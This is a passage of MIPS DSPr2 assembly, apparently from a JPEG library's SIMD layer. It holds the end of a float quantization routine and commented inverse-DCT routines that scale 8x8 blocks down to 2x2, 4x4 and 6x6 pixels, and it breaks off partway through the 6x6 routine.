lwc1 f6, 24(a2)
lwc1 f8, 28(a2)
madd.s f2, f0, f2, f10
madd.s f4, f0, f4, f12
madd.s f6, f0, f6, f14
madd.s f8, f0, f8, f16
addiu t1, t1, -16384 /* remove the bias */
addiu t2, t2, -16384
addiu t3, t3, -16384
addiu t4, t4, -16384
trunc.w.s f2, f2
trunc.w.s f4, f4
trunc.w.s f6, f6
trunc.w.s f8, f8
sh t1, 0(a0)
sh t2, 2(a0)
sh t3, 4(a0)
sh t4, 6(a0)
mfc1 t1, f2
mfc1 t2, f4
mfc1 t3, f6
mfc1 t4, f8
addiu t0, t0, -8
addiu a2, a2, 32
addiu a1, a1, 32
addiu t1, t1, -16384
addiu t2, t2, -16384
addiu t3, t3, -16384
addiu t4, t4, -16384
sh t1, 8(a0)
sh t2, 10(a0)
sh t3, 12(a0)
sh t4, 14(a0)
bgez t0, 0b
addiu a0, a0, 16 /* branch delay slot: advance output pointer */
j ra
nop
END(jsimd_quantize_float_dspr2)
#endif
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_2x2_dspr2)
/*
 * Inverse DCT with 2x2 reduced output (one block scaled down to 2x2 pixels).
 *
 * a0 = compptr->dct_table  (16-bit quantization multipliers)
 * a1 = coef_block          (16-bit DCT coefficients)
 * a2 = output_buf          (array of row pointers)
 * a3 = output_col          (byte offset added to each row pointer)
 *
 * Only DCT columns 0, 1, 3, 5 and 7 contribute to a 2-point IDCT, which is
 * why coefficient offsets 0/2/6/10/14 (and the same pattern per row) are
 * loaded and columns 2, 4 and 6 are skipped.  Pass 1 (columns) stores two
 * intermediate rows of 5 words each into a 40-byte stack buffer at v0;
 * pass 2 (rows) produces 2 pixels for each of the 2 output rows.
 *
 * s0/s1 pack the odd-part constants as 16-bit pairs for the dpa.w.ph
 * dual-MAC; s2..s5 hold the same constants unpacked for pass 2.
 * shll_s.w/sra by 24 implements the descale-with-saturation before the
 * +128 level shift (range-limit).
 */
.set at
SAVE_REGS_ON_STACK 24, s0, s1, s2, s3, s4, s5
addiu sp, sp, -40 /* 40-byte pass-1 workspace */
move v0, sp
addiu s2, zero, 29692
addiu s3, zero, -10426
addiu s4, zero, 6967
addiu s5, zero, -5906
/* Pass 1, column 0 */
lh t0, 0(a1) /* t0 = inptr[DCTSIZE*0] */
lh t5, 0(a0) /* t5 = quantptr[DCTSIZE*0] */
lh t1, 48(a1) /* t1 = inptr[DCTSIZE*3] */
lh t6, 48(a0) /* t6 = quantptr[DCTSIZE*3] */
mul t4, t5, t0
lh t0, 16(a1) /* t0 = inptr[DCTSIZE*1] */
lh t5, 16(a0) /* t5 = quantptr[DCTSIZE*1] */
mul t6, t6, t1
mul t5, t5, t0
lh t2, 80(a1) /* t2 = inptr[DCTSIZE*5] */
lh t7, 80(a0) /* t7 = quantptr[DCTSIZE*5] */
lh t3, 112(a1) /* t3 = inptr[DCTSIZE*7] */
lh t8, 112(a0) /* t8 = quantptr[DCTSIZE*7] */
mul t7, t7, t2
mult zero, zero /* clear $ac0 for the dual-MAC */
mul t8, t8, t3
li s0, 0x73FCD746 /* s0 = (29692 << 16) | (-10426 & 0xffff) */
li s1, 0x1B37E8EE /* s1 = (6967 << 16) | (-5906 & 0xffff) */
ins t6, t5, 16, 16 /* t6 = t5|t6 */
sll t4, t4, 15 /* even part: DC term << 15 */
dpa.w.ph $ac0, t6, s0 /* odd part: accumulate coef*const pairs */
lh t1, 2(a1)
lh t6, 2(a0)
ins t8, t7, 16, 16 /* t8 = t7|t8 */
dpa.w.ph $ac0, t8, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 18(a1)
lh t6, 18(a0)
lh t2, 50(a1)
lh t7, 50(a0)
mul t6, t6, t1
subu t8, t4, t0 /* bottom = even - odd */
mul t7, t7, t2
addu t0, t4, t0 /* top = even + odd */
shra_r.w t0, t0, 13 /* descale with rounding */
lh t1, 82(a1)
lh t2, 82(a0)
lh t3, 114(a1)
lh t4, 114(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 0(v0) /* wsptr row 0, this column */
sw t8, 20(v0) /* wsptr row 1, this column */
/* Pass 1, column 1 */
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
lh t1, 6(a1)
lh t6, 6(a0)
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 22(a1)
lh t6, 22(a0)
lh t2, 54(a1)
lh t7, 54(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 86(a1)
lh t2, 86(a0)
lh t3, 118(a1)
lh t4, 118(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 4(v0)
sw t8, 24(v0)
/* Pass 1, column 3 */
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
lh t1, 10(a1)
lh t6, 10(a0)
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 26(a1)
lh t6, 26(a0)
lh t2, 58(a1)
lh t7, 58(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 90(a1)
lh t2, 90(a0)
lh t3, 122(a1)
lh t4, 122(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 8(v0)
sw t8, 28(v0)
/* Pass 1, column 5 */
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
lh t1, 14(a1)
lh t6, 14(a0)
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 30(a1)
lh t6, 30(a0)
lh t2, 62(a1)
lh t7, 62(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 94(a1)
lh t2, 94(a0)
lh t3, 126(a1)
lh t4, 126(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 12(v0)
sw t8, 32(v0)
/* Pass 1, column 7, overlapped with the start of pass 2 (row 0) */
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
lw t9, 0(a2) /* output_buf[0] */
lw t3, 0(v0)
lw t7, 4(v0)
lw t1, 8(v0)
addu t9, t9, a3 /* outptr = output_buf[0] + output_col */
sll t3, t3, 15 /* even part of row 0 */
subu t8, t4, t0
addu t0, t4, t0
shra_r.w t0, t0, 13
shra_r.w t8, t8, 13
sw t0, 16(v0)
sw t8, 36(v0)
lw t5, 12(v0)
lw t6, 16(v0)
mult t7, s2 /* row 0 odd part: sum wsptr[i]*const */
madd t1, s3
madd t5, s4
madd t6, s5
lw t5, 24(v0)
lw t7, 28(v0)
mflo t0, $ac0
lw t8, 32(v0)
lw t2, 36(v0)
mult $ac1, t5, s2 /* row 1 odd part in $ac1 */
madd $ac1, t7, s3
madd $ac1, t8, s4
madd $ac1, t2, s5
addu t1, t3, t0 /* pixel 0 = even + odd */
subu t6, t3, t0 /* pixel 1 = even - odd */
shra_r.w t1, t1, 20
shra_r.w t6, t6, 20
mflo t4, $ac1
shll_s.w t1, t1, 24 /* saturate to 8 significant bits... */
shll_s.w t6, t6, 24
sra t1, t1, 24 /* ...then shift back down */
sra t6, t6, 24
addiu t1, t1, 128 /* level shift to unsigned sample range */
addiu t6, t6, 128
lw t0, 20(v0)
sb t1, 0(t9)
sb t6, 1(t9)
/* Row 1 */
sll t0, t0, 15
lw t9, 4(a2) /* output_buf[1] */
addu t1, t0, t4
subu t6, t0, t4
addu t9, t9, a3
shra_r.w t1, t1, 20
shra_r.w t6, t6, 20
shll_s.w t1, t1, 24
shll_s.w t6, t6, 24
sra t1, t1, 24
sra t6, t6, 24
addiu t1, t1, 128
addiu t6, t6, 128
sb t1, 0(t9)
sb t6, 1(t9)
addiu sp, sp, 40 /* release workspace */
RESTORE_REGS_FROM_STACK 24, s0, s1, s2, s3, s4, s5
j ra
nop
END(jsimd_idct_2x2_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_4x4_dspr2)
/*
 * Inverse DCT with 4x4 reduced output (one block scaled down to 4x4 pixels).
 *
 * a0 = compptr->dct_table  (16-bit quantization multipliers)
 * a1 = coef_block          (16-bit DCT coefficients)
 * a2 = output_buf          (array of row pointers)
 * a3 = output_col          (byte offset added to each row pointer)
 * 16(sp) = workspace[DCTSIZE*4] (buffers data between passes)
 *
 * Pass 1 processes the 8 input columns (a first loop of 4, then a second
 * loop of 3 at odd byte offsets -- note it stores results for 7 columns
 * plus the one handled on loop entry) into the caller-supplied workspace.
 * Pass 2 is fully unrolled over the 4 output rows.
 *
 * s0..s3 hold packed 16-bit constant pairs fed to the dpa.w.ph dual-MACs;
 * they correspond to the FIX() constants of the scalar 4x4 IDCT
 * (e.g. 0x2e75 = 11893 = FIX(1.451774981)) -- values taken on trust from
 * the reference implementation, not re-derived here.
 */
.set at
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
lw v1, 48(sp) /* workspace arg: 16(sp) + 32 bytes of saved regs */
move t0, a1
move t1, v1
li t9, 4 /* first-loop column counter */
li s0, 0x2e75f93e
li s1, 0x21f9ba79
li s2, 0xecc2efb0
li s3, 0x52031ccd
0:
lh s6, 32(t0) /* inptr[DCTSIZE*2] */
lh t6, 32(a0) /* quantptr[DCTSIZE*2] */
lh s7, 96(t0) /* inptr[DCTSIZE*6] */
lh t7, 96(a0) /* quantptr[DCTSIZE*6] */
mul t6, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh s4, 0(t0) /* inptr[DCTSIZE*0] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s5, 0(a0) /* quantptr[0] */
li s6, 15137 /* FIX_1_847759065 */
li s7, 6270 /* FIX_0_765366865 */
mul t2, s4, s5 /* tmp0 = (inptr[0] * quantptr[0]) */
mul t6, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh t5, 112(t0) /* inptr[DCTSIZE*7] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s4, 112(a0) /* quantptr[DCTSIZE*7] */
lh v0, 80(t0) /* inptr[DCTSIZE*5] */
lh s5, 80(a0) /* quantptr[DCTSIZE*5] */
lh s6, 48(a0) /* quantptr[DCTSIZE*3] */
sll t2, t2, 14 /* tmp0 <<= (CONST_BITS+1) */
lh s7, 16(a0) /* quantptr[DCTSIZE*1] */
lh t8, 16(t0) /* inptr[DCTSIZE*1] */
subu t6, t6, t7 /* tmp2 =
MULTIPLY(z2, t5) - MULTIPLY(z3, t6) */
lh t7, 48(t0) /* inptr[DCTSIZE*3] */
mul t5, s4, t5 /* z1 = (inptr[DCTSIZE*7] *
quantptr[DCTSIZE*7]) */
mul v0, s5, v0 /* z2 = (inptr[DCTSIZE*5] *
quantptr[DCTSIZE*5]) */
mul t7, s6, t7 /* z3 = (inptr[DCTSIZE*3] *
quantptr[DCTSIZE*3]) */
mul t8, s7, t8 /* z4 = (inptr[DCTSIZE*1] *
quantptr[DCTSIZE*1]) */
addu t3, t2, t6 /* tmp10 = tmp0 + z2 */
subu t4, t2, t6 /* tmp12 = tmp0 - z2 */
mult $ac0, zero, zero /* clear both DSP accumulators */
mult $ac1, zero, zero
ins t5, v0, 16, 16 /* pack z1|z2 for the dual-MAC */
ins t7, t8, 16, 16 /* pack z3|z4 */
addiu t9, t9, -1
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
mflo s4, $ac0 /* temp1 */
mflo s5, $ac1 /* temp2 */
addiu a0, a0, 2
addiu t1, t1, 4
addiu t0, t0, 2
addu t6, t4, s4
subu t5, t4, s4
addu s6, t3, s5
subu s7, t3, s5
shra_r.w t6, t6, 12 /* DESCALE(tmp12 + temp1, 12) */
shra_r.w t5, t5, 12 /* DESCALE(tmp12 - temp1, 12) */
shra_r.w s6, s6, 12 /* DESCALE(tmp10 + temp2, 12) */
shra_r.w s7, s7, 12 /* DESCALE(tmp10 - temp2, 12) */
sw t6, 28(t1)
sw t5, 60(t1)
sw s6, -4(t1)
bgtz t9, 0b
sw s7, 92(t1) /* branch delay slot */
/* second loop three pass */
li t9, 3
1:
lh s6, 34(t0) /* inptr[DCTSIZE*2] */
lh t6, 34(a0) /* quantptr[DCTSIZE*2] */
lh s7, 98(t0) /* inptr[DCTSIZE*6] */
lh t7, 98(a0) /* quantptr[DCTSIZE*6] */
mul t6, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh s4, 2(t0) /* inptr[DCTSIZE*0] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s5, 2(a0) /* quantptr[DCTSIZE*0] */
li s6, 15137 /* FIX_1_847759065 */
li s7, 6270 /* FIX_0_765366865 */
mul t2, s4, s5 /* tmp0 = (inptr[0] * quantptr[0]) */
mul v0, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh t5, 114(t0) /* inptr[DCTSIZE*7] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s4, 114(a0) /* quantptr[DCTSIZE*7] */
lh s5, 82(a0) /* quantptr[DCTSIZE*5] */
lh t6, 82(t0) /* inptr[DCTSIZE*5] */
sll t2, t2, 14 /* tmp0 <<= (CONST_BITS+1) */
lh s6, 50(a0) /* quantptr[DCTSIZE*3] */
lh t8, 18(t0) /* inptr[DCTSIZE*1] */
subu v0, v0, t7 /* tmp2 =
MULTIPLY(z2, t5) - MULTIPLY(z3, t6) */
lh t7, 50(t0) /* inptr[DCTSIZE*3] */
lh s7, 18(a0) /* quantptr[DCTSIZE*1] */
mul t5, s4, t5 /* z1 = (inptr[DCTSIZE*7] *
quantptr[DCTSIZE*7]) */
mul t6, s5, t6 /* z2 = (inptr[DCTSIZE*5] *
quantptr[DCTSIZE*5]) */
mul t7, s6, t7 /* z3 = (inptr[DCTSIZE*3] *
quantptr[DCTSIZE*3]) */
mul t8, s7, t8 /* z4 = (inptr[DCTSIZE*1] *
quantptr[DCTSIZE*1]) */
addu t3, t2, v0 /* tmp10 = tmp0 + z2 */
subu t4, t2, v0 /* tmp12 = tmp0 - z2 */
mult $ac0, zero, zero
mult $ac1, zero, zero
ins t5, t6, 16, 16
ins t7, t8, 16, 16
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
mflo t5, $ac0 /* temp1 */
mflo t6, $ac1 /* temp2 */
addiu t9, t9, -1
addiu t0, t0, 2
addiu a0, a0, 2
addiu t1, t1, 4
addu s5, t4, t5
subu s4, t4, t5
addu s6, t3, t6
subu s7, t3, t6
shra_r.w s5, s5, 12 /* DESCALE(tmp12 + temp1, 12) */
shra_r.w s4, s4, 12 /* DESCALE(tmp12 - temp1, 12) */
shra_r.w s6, s6, 12 /* DESCALE(tmp10 + temp2, 12) */
shra_r.w s7, s7, 12 /* DESCALE(tmp10 - temp2, 12) */
sw s5, 32(t1)
sw s4, 64(t1)
sw s6, 0(t1)
bgtz t9, 1b
sw s7, 96(t1) /* branch delay slot */
/* Pass 2: four output rows, fully unrolled.  Row 0: */
move t1, v1
li s4, 15137
lw s6, 8(t1) /* wsptr[2] */
li s5, 6270
lw s7, 24(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 0(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 28(t1) /* wsptr[7] */
lh t6, 20(t1) /* wsptr[5] */
lh t7, 12(t1) /* wsptr[3] */
lh t8, 4(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2 */
mflo s7, $ac1
subu t4, t2, s4 /* tmp12 = tmp0 - z2 */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2, 19) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2, 19) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1, 19) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1, 19) */
sll s4, t9, 2
lw v0, 0(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24 /* saturate, then shift back: range limit */
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128 /* level shift to unsigned samples */
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
/* 2 */
li s4, 15137
lw s6, 40(t1) /* wsptr[2] */
li s5, 6270
lw s7, 56(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 32(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 60(t1) /* wsptr[7] */
lh t6, 52(t1) /* wsptr[5] */
lh t7, 44(t1) /* wsptr[3] */
lh t8, 36(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2 */
mflo s7, $ac1
subu t4, t2, s4 /* tmp12 = tmp0 - z2 */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2,
CONST_BITS-PASS1_BITS+1) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2,
CONST_BITS-PASS1_BITS+1) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1,
CONST_BITS-PASS1_BITS+1) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1,
CONST_BITS-PASS1_BITS+1) */
sll s4, t9, 2
lw v0, 4(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
/* 3 */
li s4, 15137
lw s6, 72(t1) /* wsptr[2] */
li s5, 6270
lw s7, 88(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 64(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 92(t1) /* wsptr[7] */
lh t6, 84(t1) /* wsptr[5] */
lh t7, 76(t1) /* wsptr[3] */
lh t8, 68(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2 */
mflo s7, $ac1
subu t4, t2, s4 /* tmp12 = tmp0 - z2 */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2, 19) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2, 19) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1, 19) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1, 19) */
sll s4, t9, 2
lw v0, 8(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
/* 4 */
li s4, 15137
lw s6, 104(t1) /* wsptr[2] */
li s5, 6270
lw s7, 120(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 96(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 124(t1) /* wsptr[7] */
lh t6, 116(t1) /* wsptr[5] */
lh t7, 108(t1) /* wsptr[3] */
lh t8, 100(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2; */
mflo s7, $ac1
subu t4, t2, s4 /* tmp12 = tmp0 - z2; */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2, 19) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2, 19) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1, 19) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1, 19) */
sll s4, t9, 2
lw v0, 12(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_4x4_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_6x6_dspr2)
/*
 * Inverse DCT with 6x6 reduced output (one block scaled down to 6x6 pixels).
 *
 * a0 = compptr->dct_table  (16-bit quantization multipliers)
 * a1 = coef_block          (16-bit DCT coefficients)
 * a2 = output_buf          (array of row pointers)
 * a3 = output_col          (byte offset added to each row pointer)
 *
 * Pass 1 iterates over the 6 input columns and stores 6x6 intermediate
 * values into a 144-byte stack workspace; pass 2 iterates over the 6
 * rows, producing 6 pixels each.  Fixed-point constants (13-bit scale):
 *   5793  = FIX(0.707106781)
 *   10033 = FIX(1.224744871)
 *   2998  = FIX(0.366025404)
 */
.set at
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
addiu sp, sp, -144 /* workspace: 6*6 words */
move v0, sp
addiu v1, v0, 24 /* end of first 6-word row = column-loop bound */
addiu t9, zero, 5793
addiu s0, zero, 10033
addiu s1, zero, 2998
1:
lh s2, 0(a0) /* q0 = quantptr[ 0] */
lh s3, 32(a0) /* q1 = quantptr[16] */
lh s4, 64(a0) /* q2 = quantptr[32] */
lh t2, 64(a1) /* tmp2 = inptr[32] */
lh t1, 32(a1) /* tmp1 = inptr[16] */
lh t0, 0(a1) /* tmp0 = inptr[ 0] */
mul t2, t2, s4 /* tmp2 = tmp2 * q2 */
mul t1, t1, s3 /* tmp1 = tmp1 * q1 */
mul t0, t0, s2 /* tmp0 = tmp0 * q0 */
lh t6, 16(a1) /* z1 = inptr[ 8] */
lh t8, 80(a1) /* z3 = inptr[40] */
lh t7, 48(a1) /* z2 = inptr[24] */
lh s2, 16(a0) /* q0 = quantptr[ 8] */
lh s4, 80(a0) /* q2 = quantptr[40] */
lh s3, 48(a0) /* q1 = quantptr[24] */
mul t2, t2, t9 /* tmp2 = tmp2 * 5793 */
mul t1, t1, s0 /* tmp1 = tmp1 * 10033 */
sll t0, t0, 13 /* tmp0 = tmp0 << 13 */
mul t6, t6, s2 /* z1 = z1 * q0 */
mul t8, t8, s4 /* z3 = z3 * q2 */
mul t7, t7, s3 /* z2 = z2 * q1 */
addu t3, t0, t2 /* tmp10 = tmp0 + tmp2 */
sll t2, t2, 1 /* tmp2 = tmp2 << 1 */
subu t4, t0, t2 /* tmp11 = tmp0 - tmp2; */
subu t5, t3, t1 /* tmp12 = tmp10 - tmp1 */
addu t3, t3, t1 /* tmp10 = tmp10 + tmp1 */
addu t1, t6, t8 /* tmp1 = z1 + z3 */
mul t1, t1, s1 /* tmp1 = tmp1 * 2998 */
shra_r.w t4, t4, 11 /* tmp11 = (tmp11 + 1024) >> 11 */
subu t2, t6, t8 /* tmp2 = z1 - z3 */
subu t2, t2, t7 /* tmp2 = tmp2 - z2 */
sll t2, t2, 2 /* tmp2 = tmp2 << 2 */
addu t0, t6, t7 /* tmp0 = z1 + z2 */
sll t0, t0, 13 /* tmp0 = tmp0 << 13 */
subu s2, t8, t7 /* q0 = z3 - z2 */
sll s2, s2, 13 /* q0 = q0 << 13 */
addu t0, t0, t1 /* tmp0 = tmp0 + tmp1 */
addu t1, s2, t1 /* tmp1 = q0 + tmp1 */
addu s2, t4, t2 /* q0 = tmp11 + tmp2 */
subu s3, t4, t2 /* q1 = tmp11 - tmp2 */
addu t6, t3, t0 /* z1 = tmp10 + tmp0 */
subu t7, t3, t0 /* z2 = tmp10 - tmp0 */
addu t4, t5, t1 /* tmp11 = tmp12 + tmp1 */
subu t5, t5, t1 /* tmp12 = tmp12 - tmp1 */
shra_r.w t6, t6, 11 /* z1 = (z1 + 1024) >> 11 */
shra_r.w t7, t7, 11 /* z2 = (z2 + 1024) >> 11 */
shra_r.w t4, t4, 11 /* tmp11 = (tmp11 + 1024) >> 11 */
shra_r.w t5, t5, 11 /* tmp12 = (tmp12 + 1024) >> 11 */
sw s2, 24(v0) /* workspace row 1 */
sw s3, 96(v0) /* workspace row 4 */
sw t6, 0(v0) /* workspace row 0 */
sw t7, 120(v0) /* workspace row 5 */
sw t4, 48(v0) /* workspace row 2 */
sw t5, 72(v0) /* workspace row 3 */
addiu v0, v0, 4
addiu a1, a1, 2
bne v0, v1, 1b
addiu a0, a0, 2 /* branch delay slot */
/* Pass 2: process 6 rows from work array, store into output array. */
move v0, sp
addiu v1, v0, 144
2:
lw t0, 0(v0)
lw t2, 16(v0)
lw s5, 0(a2) /* output_buf[row] */
addiu t0, t0, 16 /* fold rounding bias into DC term */
sll t0, t0, 13
mul t3, t2, t9
lw t6, 4(v0)
lw t8, 20(v0)
lw t7, 12(v0)
addu s5, s5, a3 /* outptr = row pointer + output_col */
addu s6, t6, t8
mul s6, s6, s1
addu t1, t0, t3
subu t4, t0, t3
subu t4, t4, t3
lw t3, 8(v0)
mul t0, t3, s0
addu s7, t6, t7
sll s7, s7, 13
addu s7, s6, s7
subu t2, t8, t7
sll t2, t2, 13
addu t2, s6, t2
subu s6, t6, t7
subu s6, s6, t8
sll s6, s6, 13
addu t3, t1, t0
subu t5, t1, t0
addu t6, t3, s7
subu t3, t3, s7
addu t7, t4, s6
subu t4, t4, s6
